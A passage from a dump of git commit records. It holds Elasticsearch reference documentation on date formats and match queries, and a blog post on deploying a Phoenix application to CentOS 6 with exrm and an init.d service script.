specify\n`strict_date_optional_time`.\n\nThe following tables lists all the defaults ISO formats supported:\n\n`epoch_millis`::\n\n A formatter for the number of milliseconds since the epoch. Note, that\n this timestamp is subject to the limits of a Java `Long.MIN_VALUE` and\n `Long.MAX_VALUE`.\n\n`epoch_second`::\n\n A formatter for the number of seconds since the epoch. 
Note, that this\n timestamp is subject to the limits of a Java `Long.MIN_VALUE` and `Long.\n MAX_VALUE` divided by 1000 (the number of milliseconds in a second).\n\n[[strict-date-time]]`date_optional_time` or `strict_date_optional_time`::\n\n A generic ISO datetime parser where the date is mandatory and the time is\n optional.\n http:\/\/www.joda.org\/joda-time\/apidocs\/org\/joda\/time\/format\/ISODateTimeFormat.html#dateOptionalTimeParser--[Full details here].\n\n`basic_date`::\n\n A basic formatter for a full date as four digit year, two digit month of\n year, and two digit day of month: `yyyyMMdd`.\n\n`basic_date_time`::\n\n A basic formatter that combines a basic date and time, separated by a 'T':\n `yyyyMMdd'T'HHmmss.SSSZ`.\n\n`basic_date_time_no_millis`::\n\n A basic formatter that combines a basic date and time without millis,\n separated by a 'T': `yyyyMMdd'T'HHmmssZ`.\n\n`basic_ordinal_date`::\n\n A formatter for a full ordinal date, using a four digit year and three\n digit dayOfYear: `yyyyDDD`.\n\n`basic_ordinal_date_time`::\n\n A formatter for a full ordinal date and time, using a four digit year and\n three digit dayOfYear: `yyyyDDD'T'HHmmss.SSSZ`.\n\n`basic_ordinal_date_time_no_millis`::\n\n A formatter for a full ordinal date and time without millis, using a four\n digit year and three digit dayOfYear: `yyyyDDD'T'HHmmssZ`.\n\n`basic_time`::\n\n A basic formatter for a two digit hour of day, two digit minute of hour,\n two digit second of minute, three digit millis, and time zone offset:\n `HHmmss.SSSZ`.\n\n`basic_time_no_millis`::\n\n A basic formatter for a two digit hour of day, two digit minute of hour,\n two digit second of minute, and time zone offset: `HHmmssZ`.\n\n`basic_t_time`::\n\n A basic formatter for a two digit hour of day, two digit minute of hour,\n two digit second of minute, three digit millis, and time zone off set\n prefixed by 'T': `'T'HHmmss.SSSZ`.\n\n`basic_t_time_no_millis`::\n\n A basic formatter for a two digit hour of day, two digit minute of hour,\n two digit second of minute, and time zone offset prefixed by 'T':\n `'T'HHmmssZ`.\n\n`basic_week_date` or `strict_basic_week_date`::\n\n A basic formatter for a full date as four digit weekyear, two digit week\n of weekyear, and one digit day of week: `xxxx'W'wwe`.\n\n`basic_week_date_time` or `strict_basic_week_date_time`::\n\n A basic formatter that combines a basic weekyear date and time, separated\n by a 'T': `xxxx'W'wwe'T'HHmmss.SSSZ`.\n\n`basic_week_date_time_no_millis` or `strict_basic_week_date_time_no_millis`::\n\n A basic formatter that combines a basic weekyear date and time without\n millis, separated by a 'T': `xxxx'W'wwe'T'HHmmssZ`.\n\n`date` or `strict_date`::\n\n A formatter for a full date as four digit year, two digit month of year,\n and two digit day of month: `yyyy-MM-dd`.\n\n`date_hour` or `strict_date_hour`::\n\n A formatter that combines a full date and two digit hour of day.\n\n`date_hour_minute` or `strict_date_hour_minute`::\n\n A formatter that combines a full date, two digit hour of day, and two\n digit minute of hour.\n\n`date_hour_minute_second` or `strict_date_hour_minute_second`::\n\n A formatter that combines a full date, two digit hour of day, two digit\n minute of hour, and two digit second of minute.\n\n`date_hour_minute_second_fraction` or `strict_date_hour_minute_second_fraction`::\n\n A formatter that combines a full date, two digit hour of day, two digit\n minute of hour, two digit second of minute, and three digit fraction of\n second: 
`yyyy-MM-dd'T'HH:mm:ss.SSS`.\n\n`date_hour_minute_second_millis` or `strict_date_hour_minute_second_millis`::\n\n A formatter that combines a full date, two digit hour of day, two digit\n minute of hour, two digit second of minute, and three digit fraction of\n second: `yyyy-MM-dd'T'HH:mm:ss.SSS`.\n\n`date_time` or `strict_date_time`::\n\n A formatter that combines a full date and time, separated by a 'T': \n `yyyy-MM-dd'T'HH:mm:ss.SSSZZ`.\n\n`date_time_no_millis` or `strict_date_time_no_millis`::\n\n A formatter that combines a full date and time without millis, separated\n by a 'T': `yyyy-MM-dd'T'HH:mm:ssZZ`.\n\n`hour` or `strict_hour`::\n\n A formatter for a two digit hour of day.\n\n`hour_minute` or `strict_hour_minute`::\n\n A formatter for a two digit hour of day and two digit minute of hour.\n\n`hour_minute_second` or `strict_hour_minute_second`::\n\n A formatter for a two digit hour of day, two digit minute of hour, and two\n digit second of minute.\n\n`hour_minute_second_fraction` or `strict_hour_minute_second_fraction`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, and three digit fraction of second: `HH:mm:ss.SSS`.\n\n`hour_minute_second_millis` or `strict_hour_minute_second_millis`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, and three digit fraction of second: `HH:mm:ss.SSS`.\n\n`ordinal_date` or `strict_ordinal_date`::\n\n A formatter for a full ordinal date, using a four digit year and three\n digit dayOfYear: `yyyy-DDD`.\n\n`ordinal_date_time` or `strict_ordinal_date_time`::\n\n A formatter for a full ordinal date and time, using a four digit year and\n three digit dayOfYear: `yyyy-DDD'T'HH:mm:ss.SSSZZ`.\n\n`ordinal_date_time_no_millis` or `strict_ordinal_date_time_no_millis`::\n\n A formatter for a full ordinal date and time without millis, using a four\n digit year and three digit dayOfYear: `yyyy-DDD'T'HH:mm:ssZZ`.\n\n`time` or `strict_time`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, three digit fraction of second, and time zone\n offset: `HH:mm:ss.SSSZZ`.\n\n`time_no_millis` or `strict_time_no_millis`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, and time zone offset: `HH:mm:ssZZ`.\n\n`t_time` or `strict_t_time`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, three digit fraction of second, and time zone\n offset prefixed by 'T': `'T'HH:mm:ss.SSSZZ`.\n\n`t_time_no_millis` or `strict_t_time_no_millis`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, and time zone offset prefixed by 'T': `'T'HH:mm:ssZZ`.\n\n`week_date` or `strict_week_date`::\n\n A formatter for a full date as four digit weekyear, two digit week of\n weekyear, and one digit day of week: `xxxx-'W'ww-e`.\n\n`week_date_time` or `strict_week_date_time`::\n\n A formatter that combines a full weekyear date and time, separated by a\n 'T': `xxxx-'W'ww-e'T'HH:mm:ss.SSSZZ`.\n\n`week_date_time_no_millis` or `strict_week_date_time_no_millis`::\n\n A formatter that combines a full weekyear date and time without millis,\n separated by a 'T': `xxxx-'W'ww-e'T'HH:mm:ssZZ`.\n\n`weekyear` or `strict_weekyear`::\n\n A formatter for a four digit weekyear.\n\n`weekyear_week` or `strict_weekyear_week`::\n\n A formatter for a four digit weekyear and two digit week of 
weekyear.\n\n`weekyear_week_day` or `strict_weekyear_week_day`::\n\n A formatter for a four digit weekyear, two digit week of weekyear, and one\n digit day of week.\n\n`year` or `strict_year`::\n\n A formatter for a four digit year.\n\n`year_month` or `strict_year_month`::\n\n A formatter for a four digit year and two digit month of year.\n\n`year_month_day` or `strict_year_month_day`::\n\n A formatter for a four digit year, two digit month of year, and two digit\n day of month.\n\n
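For reference, a format name from this list is applied through the `format` parameter of a `date` field in the mapping. A minimal sketch (`my_index` and `created_at` are illustrative names, and the exact mapping syntax depends on your {es} version):\n\n[source,js]\n--------------------------------------------------\nPUT my_index\n{\n \"mappings\": {\n \"properties\": {\n \"created_at\": {\n \"type\": \"date\",\n \"format\": \"basic_date_time\"\n }\n }\n }\n}\n--------------------------------------------------\n\nMultiple formats can also be combined by separating them with `||`; each format is tried in turn until one matches.\n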
","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7d1db91245792400ac999825957de8f7536b285a","subject":"Document restrictions on fuzzy matching when using synonyms (#40783)","message":"Document restrictions on fuzzy matching when using synonyms (#40783)\n\nRelates to #25518 #41592\n","repos":"vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra","old_file":"docs\/reference\/query-dsl\/match-query.asciidoc","new_file":"docs\/reference\/query-dsl\/match-query.asciidoc","new_contents":"[[query-dsl-match-query]]\n=== Match Query\n\n\n`match` queries accept text\/numerics\/dates, analyze\nthem, and construct a query. For example:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\" : \"this is a test\"\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nNote that `message` is the name of a field; you can substitute the name of\nany field instead.\n\n[[query-dsl-match-query-boolean]]\n==== match\n\nThe `match` query is of type `boolean`. It means that the text\nprovided is analyzed and the analysis process constructs a boolean query\nfrom the provided text. The `operator` flag can be set to `or` or `and`\nto control the boolean clauses (defaults to `or`). The minimum number of\noptional `should` clauses to match can be set using the\n<<query-dsl-minimum-should-match,`minimum_should_match`>>\nparameter.\n\nHere is an example of providing additional parameters (note the slight\nchange in structure; `message` is the field name):\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\" : {\n \"query\" : \"this is a test\",\n \"operator\" : \"and\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n
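The <<query-dsl-minimum-should-match,`minimum_should_match`>> parameter mentioned above can be set in the same way. For instance, the following sketch (the field name and query text are illustrative) requires at least two of the analyzed terms to match:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\" : {\n \"query\" : \"this is a test\",\n \"minimum_should_match\" : 2\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n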
The `analyzer` can be set to control which analyzer will perform the\nanalysis process on the text. It defaults to the field's explicit mapping\ndefinition, or the default search analyzer.\n\nThe `lenient` parameter can be set to `true` to ignore exceptions caused by\ndata-type mismatches, such as trying to query a numeric field with a text\nquery string. Defaults to `false`.\n\n[[query-dsl-match-query-fuzziness]]\n===== Fuzziness\n\n`fuzziness` allows _fuzzy matching_ based on the type of field being queried.\nSee <<fuzziness>> for allowed settings.\n\nThe `prefix_length` and\n`max_expansions` can be set in this case to control the fuzzy process.\nIf the fuzzy option is set, the query will use `top_terms_blended_freqs_${max_expansions}`\nas its <<query-dsl-multi-term-rewrite,rewrite\nmethod>>; the `fuzzy_rewrite` parameter allows you to control how the query will get\nrewritten.\n\nFuzzy transpositions (`ab` -> `ba`) are allowed by default but can be disabled\nby setting `fuzzy_transpositions` to `false`.\n\nNote that fuzzy matching is not applied to terms with synonyms, as under the hood\nthese terms are expanded to a special synonym query that blends term frequencies,\nwhich does not support fuzzy expansion.\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\" : {\n \"query\" : \"this is a testt\",\n \"fuzziness\": \"AUTO\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[[query-dsl-match-query-zero]]\n===== Zero terms query\nIf the analyzer used removes all tokens in a query like a `stop` filter\ndoes, the default behavior is to match no documents at all. In order to\nchange that, the `zero_terms_query` option can be used, which accepts\n`none` (default) and `all` which corresponds to a `match_all` query.\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\" : {\n \"query\" : \"to be or not to be\",\n \"operator\" : \"and\",\n \"zero_terms_query\": \"all\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[[query-dsl-match-query-cutoff]]\n===== Cutoff frequency\n\nThe match query supports a `cutoff_frequency` that allows\nspecifying an absolute or relative document frequency where high\nfrequency terms are moved into an optional subquery and are only scored\nif one of the low frequency (below the cutoff) terms in the case of an\n`or` operator or all of the low frequency terms in the case of an `and`\noperator match.\n\nThis query allows handling `stopwords` dynamically at runtime, is domain\nindependent and doesn't require a stopword file. It prevents scoring \/\niterating high frequency terms and only takes the terms into account if a\nmore significant \/ lower frequency term matches a document. Yet, if all\nof the query terms are above the given `cutoff_frequency` the query is\nautomatically transformed into a pure conjunction (`and`) query to\nensure fast execution.\n\nThe `cutoff_frequency` can either be relative to the total number of\ndocuments if in the range `[0..1)` or absolute if greater than or equal to\n`1.0`.\n\nHere is an example showing a query composed of stopwords exclusively:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\" : {\n \"query\" : \"to be or not to be\",\n \"cutoff_frequency\" : 0.001\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nIMPORTANT: The `cutoff_frequency` option operates on a per-shard level. This means\nthat when trying it out on test indices with low document counts you\nshould follow the advice in {defguide}\/relevance-is-broken.html[Relevance is broken].\n\n[[query-dsl-match-query-synonyms]]\n===== Synonyms\n\nThe `match` query supports multi-term synonym expansion with the <<analysis-synonym-graph-tokenfilter,\nsynonym_graph>> token filter. When this filter is used, the parser creates a phrase query for each multi-term synonym.\nFor example, the following synonym: `\"ny, new york\"` would produce:\n\n`(ny OR (\"new york\"))`\n\nIt is also possible to match multi-term synonyms with conjunctions instead:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\": {\n \"query\" : \"ny city\",\n \"auto_generate_synonyms_phrase_query\" : false\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe example above creates a boolean query:\n\n`(ny OR (new AND york)) city`\n\nthat matches documents with the term `ny` or the conjunction `new AND york`.\nBy default the parameter `auto_generate_synonyms_phrase_query` is set to `true`.\n\n\n.Comparison to query_string \/ field\n**************************************************\n\nThe match family of queries does not go through a \"query parsing\"\nprocess. It does not support field name prefixes, wildcard characters,\nor other \"advanced\" features. For this reason, the chances of it failing are\nvery small \/ non-existent, and it provides excellent behavior when it\ncomes to simply analyzing and running that text as a query (which is\nusually what a text search box does). Also, the `phrase_prefix` type can\nprovide a great \"as you type\" behavior to automatically load search\nresults.\n\n**************************************************\n","old_contents":"[[query-dsl-match-query]]\n=== Match Query\n\n\n`match` queries accept text\/numerics\/dates, analyzes\nthem, and constructs a query. For example:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\" : \"this is a test\"\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nNote, `message` is the name of a field, you can substitute the name of\nany field instead.\n\n[[query-dsl-match-query-boolean]]\n==== match\n\nThe `match` query is of type `boolean`. It means that the text\nprovided is analyzed and the analysis process constructs a boolean query\nfrom the provided text. The `operator` flag can be set to `or` or `and`\nto control the boolean clauses (defaults to `or`). The minimum number of\noptional `should` clauses to match can be set using the\n<<query-dsl-minimum-should-match,`minimum_should_match`>>\nparameter.\n\nHere is an example when providing additional parameters (note the slight\nchange in structure, `message` is the field name):\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\" : {\n \"query\" : \"this is a test\",\n \"operator\" : \"and\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe `analyzer` can be set to control which analyzer will perform the\nanalysis process on the text. It defaults to the field explicit mapping\ndefinition, or the default search analyzer.\n\nThe `lenient` parameter can be set to `true` to ignore exceptions caused by\ndata-type mismatches, such as trying to query a numeric field with a text\nquery string. 
Defaults to `false`.\n\n[[query-dsl-match-query-fuzziness]]\n===== Fuzziness\n\n`fuzziness` allows _fuzzy matching_ based on the type of field being queried.\nSee <<fuzziness>> for allowed settings.\n\nThe `prefix_length` and\n`max_expansions` can be set in this case to control the fuzzy process.\nIf the fuzzy option is set the query will use `top_terms_blended_freqs_${max_expansions}`\nas its <<query-dsl-multi-term-rewrite,rewrite\nmethod>> the `fuzzy_rewrite` parameter allows to control how the query will get\nrewritten.\n\nFuzzy transpositions (`ab` -> `ba`) are allowed by default but can be disabled\nby setting `fuzzy_transpositions` to `false`.\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\" : {\n \"query\" : \"this is a testt\",\n \"fuzziness\": \"AUTO\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[[query-dsl-match-query-zero]]\n===== Zero terms query\nIf the analyzer used removes all tokens in a query like a `stop` filter\ndoes, the default behavior is to match no documents at all. In order to\nchange that the `zero_terms_query` option can be used, which accepts\n`none` (default) and `all` which corresponds to a `match_all` query.\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\" : {\n \"query\" : \"to be or not to be\",\n \"operator\" : \"and\",\n \"zero_terms_query\": \"all\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[[query-dsl-match-query-cutoff]]\n===== Cutoff frequency\n\nThe match query supports a `cutoff_frequency` that allows\nspecifying an absolute or relative document frequency where high\nfrequency terms are moved into an optional subquery and are only scored\nif one of the low frequency (below the cutoff) terms in the case of an\n`or` operator or all of the low frequency terms in the case of an `and`\noperator match.\n\nThis query allows handling `stopwords` dynamically at runtime, is domain\nindependent and doesn't require a stopword file. It prevents scoring \/\niterating high frequency terms and only takes the terms into account if a\nmore significant \/ lower frequency term matches a document. Yet, if all\nof the query terms are above the given `cutoff_frequency` the query is\nautomatically transformed into a pure conjunction (`and`) query to\nensure fast execution.\n\nThe `cutoff_frequency` can either be relative to the total number of\ndocuments if in the range `[0..1)` or absolute if greater or equal to\n`1.0`.\n\nHere is an example showing a query composed of stopwords exclusively:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\" : {\n \"query\" : \"to be or not to be\",\n \"cutoff_frequency\" : 0.001\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nIMPORTANT: The `cutoff_frequency` option operates on a per-shard-level. This means\nthat when trying it out on test indexes with low document numbers you\nshould follow the advice in {defguide}\/relevance-is-broken.html[Relevance is broken].\n\n[[query-dsl-match-query-synonyms]]\n===== Synonyms\n\nThe `match` query supports multi-terms synonym expansion with the <<analysis-synonym-graph-tokenfilter,\nsynonym_graph>> token filter. 
When this filter is used, the parser creates a phrase query for each multi-terms synonyms.\nFor example, the following synonym: `\"ny, new york\" would produce:`\n\n`(ny OR (\"new york\"))`\n\nIt is also possible to match multi terms synonyms with conjunctions instead:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\": {\n \"query\" : \"ny city\",\n \"auto_generate_synonyms_phrase_query\" : false\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe example above creates a boolean query:\n\n`(ny OR (new AND york)) city`\n\nthat matches documents with the term `ny` or the conjunction `new AND york`.\nBy default the parameter `auto_generate_synonyms_phrase_query` is set to `true`.\n\n\n.Comparison to query_string \/ field\n**************************************************\n\nThe match family of queries does not go through a \"query parsing\"\nprocess. It does not support field name prefixes, wildcard characters,\nor other \"advanced\" features. For this reason, chances of it failing are\nvery small \/ non existent, and it provides an excellent behavior when it\ncomes to just analyze and run that text as a query behavior (which is\nusually what a text search box does). Also, the `phrase_prefix` type can\nprovide a great \"as you type\" behavior to automatically load search\nresults.\n\n**************************************************\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1226195103f56275439690fdbc1fbb7e6575beb7","subject":"Update 2015-09-09-Phoenix-CentOS-6.adoc","message":"Update 2015-09-09-Phoenix-CentOS-6.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2015-09-09-Phoenix-CentOS-6.adoc","new_file":"_posts\/2015-09-09-Phoenix-CentOS-6.adoc","new_contents":"= Deploying a Phoenix Application to CentOS 6\n\n:hp-tags: elixir, phoenix\n\n## Introduction\n\nThis post explains how to deploy a Phoenix application to a production server (CentOS 6). This is not necessarily the best approach yet, and Phoenix itself will likely keep changing, so please take it as the method that works as of Phoenix 1.0.2 and Elixir 1.0.5.\n\nAlso, this walkthrough only goes as far as serving the application with Cowboy; normally you would put Nginx (or similar) in front as a reverse proxy, but that is omitted here to keep things simple.\n\n\n## Create a user to run the application\n\nCreate a user named phoenix to run the application, and set its password:\n```\n$ sudo useradd -m phoenix\n$ sudo passwd phoenix\n```\n\n\n## Installing Erlang, Elixir, node.js, and PostgreSQL\n\nInstall them by following https:\/\/cncgl.github.io\/2015\/09\/06\/Phoenix-VPS.html[Installing Phoenix on a VPS].\n\n\n## Getting the Phoenix application\n\nHere we fetch phoenix-sample from git. The working directory will be $HOME\/git\/phoenix-sample.\n\n```\n$ mkdir git\n$ cd git\n$ git clone https:\/\/github.com\/cncgl\/phoenix-sample.git\n$ cd phoenix-sample\n```\n## Configuring the database connection\n\nSet up config\/prod.secret.exs, which is used by the release build. It is not stored in the git repository, so create it from scratch.\nYou can type anything into secret_key_base, but copying the value generated by `` mix phoenix.gen.secret`` gives you a properly random string.\n\n```\n$cat config\/prod.secret.exs\nuse Mix.Config\n\n# In this file, we keep production configuration that\n# you likely want to automate and keep it away from\n# your version control system.\n\n# You can generate a new secret by running:\n# \n# mix phoenix.gen.secret\nconfig :hello_phoenix, HelloPhoenix.Endpoint,\n http: [port: 4001],\t\t\t\t\t# port to run on\n url: [host: \"mydomain.com\"], # host to run on\n secret_key_base: \"CrL8\/FvT9RhfgYlq0DnYsPBvB2NNswRiLLYIa1Dc1\/rPUtLchuYupZ2ePDkvTV58\"\n\n# Configure your database\nconfig :hello_phoenix, HelloPhoenix.Repo,\n adapter: Ecto.Adapters.Postgres,\n username: \"postgres\",\n password: \"postgres\",\n database: \"hello_phoenix_prod\",\n pool_size: 20\n\n```\n\n\n
## Fetching dependencies and building\n\nThe Phoenix framework recommends release builds with http:\/\/www.phoenixframework.org\/docs\/advanced-deployment[Exrm (Elixir Release Manager)]. The release process requires the https:\/\/github.com\/bitwalker\/exrm[exrm] package. phoenix-sample has already been updated accordingly; for any other project, check mix.exs and add exrm to deps.\n\n```\n$ cat mix.exs\n...\n(snip)\n...\ndefp deps do\n [{:phoenix, \"~> 1.0.0\"},\n {:phoenix_ecto, \"~> 1.1\"},\n {:postgrex, \">= 0.0.0\"},\n {:phoenix_html, \"~> 2.1\"},\n {:phoenix_live_reload, \"~> 1.0\", only: :dev},\n {:cowboy, \"~> 1.0\"},\n {:exrm, \"~> 0.15.3\"}] # added\nend\n```\n\n\n\n\nIf brunch.js is not installed, install it with `` npm i -g brunch``.\n\n```\n$ mix deps.get --only prod # fetch dependencies\n$ MIX_ENV=prod mix compile # compile the .ex files\n$ brunch b -P # build the assets\n$ MIX_ENV=prod mix phoenix.digest\n$ MIX_ENV=prod mix do ecto.create, ecto.migrate\n$ MIX_ENV=prod mix release\n```\nThe release step takes a little while. When it finishes, the release files are generated under the rel directory. To redo a release, run ``mix release.clean``.\n\n\n## Running as a daemon\n\nRegister the application as a daemon with the CentOS 6 service mechanism. I put Upstart on hold because the version that ships with CentOS 6 is an old 0.6.5 and could not switch users when starting the application; if I work out how to install a newer Upstart, I would like to try it. Officially, an http:\/\/www.phoenixframework.org\/docs\/advanced-deployment#section-setting-up-our-init-system[Upstart script] for running on Ubuntu is published.\n\n```\n$ cat \/etc\/init.d\/todo-phoenix\n#!\/bin\/sh\n#\n\n. \/etc\/rc.d\/init.d\/functions\n\nPROG_NAME=todo-phoenix\nUSER=phoenix\nAPP_ROOT=\/home\/phoenix\/git\/phoenix-sample\nMIX_ENV=prod\nSTART_CMD=\"rel\/hello_phoenix\/bin\/hello_phoenix start -detached\"\nSTOP_CMD=\"rel\/hello_phoenix\/bin\/hello_phoenix stop\"\n\nexport PATH=\/usr\/elixir\/bin:\/usr\/local\/bin:$PATH\ncd $APP_ROOT || exit 1\n\ncase $1 in\n start)\n echo -n $\"Starting $PROG_NAME: \"\n sudo -u phoenix $START_CMD\n ;;\n stop)\n echo -n $\"Shutting down $PROG_NAME: \"\n sudo -u phoenix $STOP_CMD\n ;;\n restart)\n echo -n $\"Restarting $PROG_NAME: \"\n sudo -u phoenix $STOP_CMD\n sudo -u phoenix $START_CMD\n ;;\n *)\n echo >&2 \"Usage: $0 <start|stop|restart>\"\n exit 1\n ;;\nesac\nexit $?\n```\n\nWith this script, ``sudo service todo-phoenix start`` starts the application and ``sudo service todo-phoenix stop`` stops it. The important point is to start it with the -detached option, as in ``hello_phoenix start -detached``. With plain start, the application apparently keeps writing to the console even when run as a daemon, and it runs out of memory under load.\n\nFor details, see http:\/\/qiita.com\/maruware\/items\/7765837384795b1d9659[phoenix\u3067mix release\u3057\u305f\u3068\u304d\u306b\u30e1\u30e2\u30ea\u304c\u6ea2\u308c\u308b\u306e\u3092\u89e3\u6c7a - Qiita].
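\n\nOne optional extra step: to have the service start automatically at boot, add a standard `# chkconfig: 2345 90 10` header comment to the script and register it with chkconfig (the usual tool on CentOS 6):\n\n```\n$ sudo chkconfig --add todo-phoenix\n$ sudo chkconfig todo-phoenix on\n```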
\n\n\n","old_contents":"= Phoenix \u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092 CentOS 6 \u3078\u30c7\u30d7\u30ed\u30a4\u3059\u308b\n\n:hp-tags: elixir, phoenix\n\n## \u306f\u3058\u3081\u306b\n\nPhoenix \u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092 \u672c\u904b\u7528\u30b5\u30fc\u30d0\u30fc(CentOS 6) 
\u3078\u30c7\u30d7\u30ed\u30a4\u3059\u308b\u65b9\u6cd5\u306e\u8aac\u660e\u3092\u3057\u307e\u3059\u3002\u307e\u3060\u3001\u30d9\u30b9\u30c8\u3067\u306f\u306a\u3044\u3067\u3059\u3057\u3001\u4eca\u5f8c\u3082 Phoenix \u5074\u306b\u3082\u5909\u66f4\u304c\u3042\u308b\u304b\u3068\u601d\u3044\u307e\u3059\u3002Phoenix 1.0.2, Elixir 1.0.5 \u73fe\u5728\u3067\u306e\u65b9\u6cd5\u3068\u3054\u7406\u89e3\u304f\u3060\u3055\u3044\u3002\n\n\u307e\u305f\u3001Cowboy \u3067\u7acb\u3061\u4e0a\u3052\u308b\u307e\u3067\u306e\u89e3\u8aac\u3067\u3001\u672c\u6765\u306a\u3089 Nginx \u306a\u308a\u306b\u30ea\u30d0\u30fc\u30b9\u30d7\u30ed\u30ad\u30b7\u3067\u63a5\u7d9a\u3059\u308b\u306e\u3067\u3059\u304c\u3001\u7169\u96d1\u306b\u306a\u308b\u306e\u3067\u7701\u7565\u3057\u3066\u3044\u307e\u3059\u3002\n\n\n## \u5b9f\u884c\u7528\u30e6\u30fc\u30b6\u30fc\u3092\u4f5c\u6210\u3059\u308b\u3002\n\n\u30a2\u30d7\u30ea\u5b9f\u884c\u7528\u306e\u30e6\u30fc\u30b6\u30fc\u3092 phoenix \u306b\u3057\u3066\u4f5c\u6210\u3057\u307e\u3059\u3002\u30d1\u30b9\u30ef\u30fc\u30c9\u3082\u4f5c\u6210\u3057\u307e\u3059\u3002\n```\n$ sudo useradd -m phoenix\n$ sudo passwd phoenix\n```\n\n\n## Erlang, Elixir, node.js, PostgreSQL \u306e\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\n\nhttps:\/\/cncgl.github.io\/2015\/09\/06\/Phoenix-VPS.html[Phoenix \u3092 VPS \u3078\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b] \u3092\u53c2\u8003\u306b\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u307e\u3059\u3002\n\n\n## Phoenix \u30a2\u30d7\u30ea\u3092\u53d6\u5f97\u3059\u308b\n\n\u3053\u3053\u3067\u306f\u3001Phoenix-sample \u3092git \u3088\u308a\u53d6\u5f97\u3057\u307e\u3059\u3002\u5b9f\u884c\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u306f\u3001$HOME\/git\/phoenix-sample \u3068\u3057\u307e\u3059\u3002\n\n```\n$ mkdir git\n$ cd git\n$ git clone https:\/\/github.com\/cncgl\/phoenix-sample.git\n$ cd phoenix-sample\n```\n## \u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u63a5\u7d9a\u306e\u8a2d\u5b9a\n\n\u30ea\u30ea\u30fc\u30b9\u7248\u3067\u4f7f\u7528\u3059\u308b config\/prod.secret.exs \u3092\u8a2d\u5b9a\u3059\u308b\u3002git \u30ea\u30dd\u30b8\u30c8\u30ea\u3067\u306f\u4fdd\u5b58\u3057\u306a\u3044\u306e\u3067\u65b0\u898f\u306b\u4f5c\u6210\u3057\u307e\u3059\u3002\n\u3053\u3053\u3067 secret_key_base \u306f\u9069\u5f53\u306b\u5165\u529b\u3057\u3066\u3082\u3044\u3044\u3067\u3059\u304c\u3001`` mix phoenix.gen.secret`` \u306b\u3088\u308a\u751f\u6210\u3057\u3066\u304f\u308c\u308b\u3082\u306e\u3092\u30b3\u30d4\u30da\u3059\u308c\u3070\u3088\u308a\u30e9\u30f3\u30c0\u30e0\u306a\u6587\u5b57\u5217\u3092\u751f\u6210\u3055\u308c\u307e\u3059\u3002\n\n```\n$cat config\/prod.secret.exs\nuse Mix.Config\n\n# In this file, we keep production configuration that\n# you likely want to automate and keep it away from\n# your version contorl system.\n\n# You can generate a new secret by running:\n# \n# mix phoenix.gen.secret\nconfig :hello_phoenix, HelloPhoenix.Endpoint,\n http: [port: 4001],\t\t\t\t\t# \u5b9f\u884c\u30dd\u30fc\u30c8\n url: [host: \"mydomain.com\"], # \u5b9f\u884c\u30db\u30b9\u30c8\n secret_key_base: \"CrL8\/FvT9RhfgYlq0DnYsPBvB2NNswRiLLYIa1Dc1\/rPUtLchuYupZ2ePDkvTV58\"\n\n# Configure your database\nconfig :hello_phoenix, HelloPhoenix.Repo,\n adapter: 